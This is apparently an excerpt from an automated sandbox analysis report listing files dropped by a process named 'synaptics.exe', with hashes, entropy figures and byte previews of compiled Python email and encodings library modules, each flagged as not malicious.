                                                                                                                                                                                                                                  Preview:o........'-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....2C:\Users\Public\M20EKMMEH2\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.s.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14793
                                                                                                                                                                                                                                  Entropy (8bit):5.054206747012966
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jbtx++ovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:jbt1oM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                                                  MD5:D32115AB24EDCCB0284843072C756D2B
                                                                                                                                                                                                                                  SHA1:83947325373FE2DA5F536EE779DB69D3487676AC
                                                                                                                                                                                                                                  SHA-256:6FC1E26AF05E603D5679EA1D58C375E0072502A01E82246B63043D044D11B224
                                                                                                                                                                                                                                  SHA-512:9C1F0DF72262E2EF10ACB8FD63AD0CBFFB1943FDC81CD208C3735C136565D0ED4E42619A2217A382EBD2C4C21E7EE4D049A826A9DC449388C2CAC84A973970A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3251
                                                                                                                                                                                                                                  Entropy (8bit):5.380330585726796
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IGlAnFLYxoMN59tl3kWReNFOsr3S8/sMGQHbfuaJg+EtINnig2b4nm+M78ozTho:7OFLsbReNFxrd2QSaO+Eiig2gmV78oHu
                                                                                                                                                                                                                                  MD5:84C9610F6A6DB97D3723572DDD7AA83D
                                                                                                                                                                                                                                  SHA1:213C58E947FCB87E7F47481C65CACD8BDD6DE804
                                                                                                                                                                                                                                  SHA-256:61492622A50247288F897844326972C28D906878FDC277D903E2DF558A09689A
                                                                                                                                                                                                                                  SHA-512:E7973B1B1027E2C449F077E12CBF315619C5B61D59D4E80C48DE177C5DCF97F1B026B28559C41ADD6390930418255AE2947AE40989FD14A05B2EBBF708F92669
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11586
                                                                                                                                                                                                                                  Entropy (8bit):5.325848276943549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+71q2Qm6z+wYiW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:e1ZRS+ZP2yGRz/p2/5ObDbv+w
                                                                                                                                                                                                                                  MD5:A022A0C1B6E00AEA3C797BD889B0CE40
                                                                                                                                                                                                                                  SHA1:950CCBF6978208975F1248AB635CE71819D8A487
                                                                                                                                                                                                                                  SHA-256:83FE80F657C6BDC5F5A25B95ABFB006678300468FE292451C8FDD7CF561E64CE
                                                                                                                                                                                                                                  SHA-512:13DF1EE5843B10A875AF348C24E971C2BE7F621C464770D8CFE74A68033D519F65A57FFA1EB59456D17646888EB4B205BA67B625AF631F993D2A23A2C47ACCA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1638
                                                                                                                                                                                                                                  Entropy (8bit):5.0902013007626135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1y7gaTT5rqICrNt7xYWWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:1/9ht7OWWEgQFYSvrEDkvyz3
                                                                                                                                                                                                                                  MD5:F240C45CEA0F49DCA2826FC5E3E9D285
                                                                                                                                                                                                                                  SHA1:A24599BE0651AAE204AFADF699BA188D2DFA40BB
                                                                                                                                                                                                                                  SHA-256:B7D7F1EB2E3634D4E8915B8CF401C67B73354C3292FF741D4399B03BFBD0B8E7
                                                                                                                                                                                                                                  SHA-512:79742EC868846426FBD1AAF6F41F4F7630C164EBEC007F8B1861B703A3EE05D23AA902FA603AAAC66FF55DC9AB4A39B6CF69BEC981C72DFE04CA154B48634ED8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....0C:\Users\Public\M20EKMMEH2\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding he
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5713
                                                                                                                                                                                                                                  Entropy (8bit):4.736039051135126
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wYI+E7YT1ZUQ6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:wYTEOKQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                                                  MD5:A8995099F79618959EE8A69F66DA9E5E
                                                                                                                                                                                                                                  SHA1:6B807F52211687AF62741F8D864F44F75F5153A4
                                                                                                                                                                                                                                  SHA-256:B962CF3AA5673D74F9EFA7759C73E60C76B09C5F70B732334FBF5EFF02D5A9E3
                                                                                                                                                                                                                                  SHA-512:FD1018FC23D6E21AC07E4595C3AFCF9D5B023961A6AF577286298EC123E3B55691950A81D15C76721772728FF6BDBE557874011018F7D8CB3B85270BA6D9E2F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r......C:\Users\Public\M20EKMMEH2\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r.......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10589
                                                                                                                                                                                                                                  Entropy (8bit):5.448131486999686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:MQt3lEm00KYgjRm95weZd6S3DFKTbefqH0P302hjD8gYo5:HtVEz0KYr5weZJ3DFSbei+029D8Zo5
                                                                                                                                                                                                                                  MD5:2123BC92446F0AA229F78D993A5DDE43
                                                                                                                                                                                                                                  SHA1:91665FBD5E8EA4635950993427FAC24E1DD1B2B8
                                                                                                                                                                                                                                  SHA-256:B6A7CDB552CB334F62A88CFFA69E4328EBF18ECD169291F809C86976274F47A5
                                                                                                                                                                                                                                  SHA-512:668A241E8A03C144F477AB10F1B11C634B937832F93B901618B52B4D365D7339DACC2C0F41AAB552F498F1EB8737887C6EB6CFDA8F9BB10A38770D8A391055D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16473
                                                                                                                                                                                                                                  Entropy (8bit):5.351481404152596
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:lEojVdDyA8pfSNW44RPb/bliTC72UjV9LFqSevFmHj0HP8HMJ25cPh:lEy/85S844NbMGvcPh
                                                                                                                                                                                                                                  MD5:A027615B6EA5EBE31403F7E5BF1C8A3D
                                                                                                                                                                                                                                  SHA1:F9C171B7D9B15B5CCC5376667BF1FEDCD57919E9
                                                                                                                                                                                                                                  SHA-256:6735EDF430D2603BEA23E3D11A2A4F2CED3640377A4D33322B33E92EE112C218
                                                                                                                                                                                                                                  SHA-512:CF6F1F16F07041B8E58E9C487617A2E00F1623FBB86FB159EB42DA415E9589B58FD6DA1915F5BFB3570A749939769665F0A96E42919BF45B23E22BE5B0F081E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1979
                                                                                                                                                                                                                                  Entropy (8bit):5.3421050349273775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:mhA49ILWjxO3OzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:mrIWdl5UFsMbhOQGTEl9
                                                                                                                                                                                                                                  MD5:4F9D1A686F5C9922F5A7F4A5B6B99640
                                                                                                                                                                                                                                  SHA1:1840F5F3CB316BCF499C27082B9ACF7530E3835D
                                                                                                                                                                                                                                  SHA-256:F412B4C149BDEF4AAF1BF5B544DF32CDBD63B58DC3A7ED861BA932C55B643B7E
                                                                                                                                                                                                                                  SHA-512:D0B4203BB46B9ED1CE3790B0B55F692079615FC8189F9B1EEBF7117DDC53BF8DEFE28275904724661DF4D57054D78A32F56B8DCC38FF4FAE8FED7487DB0CC4C2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....1C:\Users\Public\M20EKMMEH2\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:.....|
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37815
                                                                                                                                                                                                                                  Entropy (8bit):5.296198903345635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:z3vKre029TBAXUyI2UBNqLYn1cT93o29Aev5Oi/GTs:DvN029TSUr26N+OaT9YmAOSs
                                                                                                                                                                                                                                  MD5:50C2C9B2B4F6C45EF57599A577BDAD1E
                                                                                                                                                                                                                                  SHA1:7735797AB935432779EFAED072626C96B6C16D13
                                                                                                                                                                                                                                  SHA-256:DF608A6AB9B9E599CE45C00BF1413B5EA363A70B9A90617487D1D6DA9396603A
                                                                                                                                                                                                                                  SHA-512:F6F9BCFFD811F664F084CF7C6B3C81AD65F8484F3570FC33AE9A9465DA200F3568C82C782CE874D87569177E5FE26F2A0D8BFE76F3B98949862A43E8465440EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r...../C:\Users\Public\M20EKMMEH2\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will quo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5684
                                                                                                                                                                                                                                  Entropy (8bit):4.921512313684053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:l/3XAtU7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:pgtU7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                                                  MD5:DBCFFFD37DABF422AA931348E419E862
                                                                                                                                                                                                                                  SHA1:9C75F77DB32BD946445E204DAF3BAC56E8DC82CE
                                                                                                                                                                                                                                  SHA-256:42D20C7DF0AF6D04DE200F9AB242EA2E1EB83A63B6E0AF0C0299A4B10DEEE37B
                                                                                                                                                                                                                                  SHA-512:9C1091E09FAC2844602DC1F69634E579A694CF9061A7D80A2A13BD04B42C854511264EFF4C4549319AEAAF06789A9FA61C60170A2A85A6787F23DCD27A652387
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7634
                                                                                                                                                                                                                                  Entropy (8bit):5.50712611139407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:eLJLyjCY2rlgeRk/SEe4iIf3HOxK4RVZtpes7tOcQekFUyq2n1/ugYu9eYBAd7z4:yJYUGQ2SEr27RlpsyyFhugYQeYBk8B9
                                                                                                                                                                                                                                  MD5:251E90F5899356853C473DE37BC5D91C
                                                                                                                                                                                                                                  SHA1:2CA10B7AA1F1E5C5E53C8BC19847A32420C3E3F7
                                                                                                                                                                                                                                  SHA-256:D89A63F6C8D2B19FBC504EB2F4C0D324F84C6AE95E7143EC426B416A92E91F99
                                                                                                                                                                                                                                  SHA-512:8756F9DABD7EB0956F76C3FD23928DC7D220FF7554E43759D1392966920631ACCC23DDB02C7B579F9E6ECA47E4F1BF15CCF6A790705167C2094C03BC21F5CCEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9697
                                                                                                                                                                                                                                  Entropy (8bit):5.526810916927129
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6bd41opYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cGGZscLPtCSStw3TG/3W4b/o:upyv+FSwNBrUmbXDu4QRPzGyGn/o
                                                                                                                                                                                                                                  MD5:E9086B6752060E87232DD5E5611EE7CC
                                                                                                                                                                                                                                  SHA1:3017476963B50D1CC5D3F76E4D8079542E2996CA
                                                                                                                                                                                                                                  SHA-256:60FB46A6E7287259B1A533FBF42CD4ABDC07C4062515E7B60FD47F0D789AA0FC
                                                                                                                                                                                                                                  SHA-512:02024037D85C99AF27475BBA9CF488944B22957832A62AE34904FAFAA521BC87B671C84C4F5366ACD7439D5EF4422BAB47BAEFAFFB9A103529D4BA97DDB33548
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....-C:\Users\Public\M20EKMMEH2\lib\email\utils.py.._has_surrogates3...s...............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3886
                                                                                                                                                                                                                                  Entropy (8bit):5.53529365376628
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wXLHIYGspF3e06Q0YhQHUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:wXEYLpFkYUU7XYLf5c6+X1Y
                                                                                                                                                                                                                                  MD5:8AD5E4A14646029D8BA076E3C73F94C7
                                                                                                                                                                                                                                  SHA1:52FF97077DC1B154B610389CDD49DBE477B0D484
                                                                                                                                                                                                                                  SHA-256:DE0517316828913B3FD9904E74CDDE8595E2D4426A571B0D805C132736C31B1D
                                                                                                                                                                                                                                  SHA-512:EE9EE21C61A0C6A6802B8180870CC75F8E261B955271D94D86C0CDF5525B2581B08C5F9902714B7B79EABEF3A2D48FD57B5426AC7A3C26C39A57156BFCC22AF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10932
                                                                                                                                                                                                                                  Entropy (8bit):5.843340781913276
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iJzxOkq4bpehh3qkyR0N:wXG0bueBI6fzx9IX6Ri
